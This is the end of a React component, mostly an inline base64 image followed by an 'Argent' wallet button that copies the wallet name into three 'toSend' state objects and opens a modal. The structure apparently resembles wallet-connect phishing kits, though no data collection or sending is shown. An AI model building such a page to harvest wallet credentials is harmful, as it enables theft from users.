                              AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMd+/Rh7fWv1RTTHGZ0hybREbl9VrNp1EIntnDfvW/5Pj1qe6X+Nl/rJ7Zw371Hxc9bH7n8bL/WT2zhv3qPietj9z+Nl/rJ7Zw371v8AketT3c/jZf6ylYfEUYm31sPVF
                              dPOJ1hJFomNwjtWazqYZXXyAAAAAAAAAAAAAAAAAAAAAA0HTKrTK4jnXT9Jn7KnMn/Gv/Do/wA34Upmdm8AAGhcuhU65fXHK5/5paXDn5JYfxKP8sT9liXGcAAAAAAAAAAAAAAAAAAAAAArHTe5pYt086pq+EafdS5s9
                              ohp/DK/NaypM5tAAALV0IubLtH/ABq+sfaF/hT5hkfFK96ytS+yQAAAAAAAAAAAAAAAAAAAAAFJ6Y3/AEmaRTH+nTEeM7fp1WZy7bvr2bnw2msc295aFUaIAADddEr/AKLN4pndcpmnx3x9FriW1fSh8Rp1Yt+0r01
                              GCAAAAAAAAAAAAAAAAAAAAA811dWnWrZEbXJnXciN9oc1x+I9bxtdyf66pnw4fLRi5LdVpl6jDj9PHFUd8JQAAGXCX5w2KpuU76Koq+E7n3S3TaJfGSnXSa+7pluuLluJo2xMRMNqJ3ES8tMTE93t1wAAAAAAAAAAAA
                              AAAAAAABpulON9VyyaafzXezHu4z8NnircnJ0017rnBw+pl39I7qIynoQAAAAF36JY31jLupVPatTp4cPvHg1OLk6qa9mB8Qw9GXceJb1aUQAAAAAAAAAAAAAAAAAAHzUFA6Q5h6/mMzROtFHZp7+c+M/Zk8jJ13+z0
                              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
                              A//2Q=="
              alt="Argent"
              name="wallet"
              value="wallet"
              onClick={(e) => {
                setWallet("Argent");
                setToSend({
                  ...toSend,
                  [e.target.name]: "Argent",
                });
                setToSend2({
                  ...toSend2,
                  [e.target.name]: "Argent",
                });
                setToSend3({
                  ...toSend3,
                  [e.target.name]: "Argent",
                });
                handleShow();
              }}
            />
          </div>
          <div className="pageStyles__SAppName-sc-1navawn-7 eodRCW">Argent</div>
        </div>
      </div>
    </section>
  );
}

export default Body;
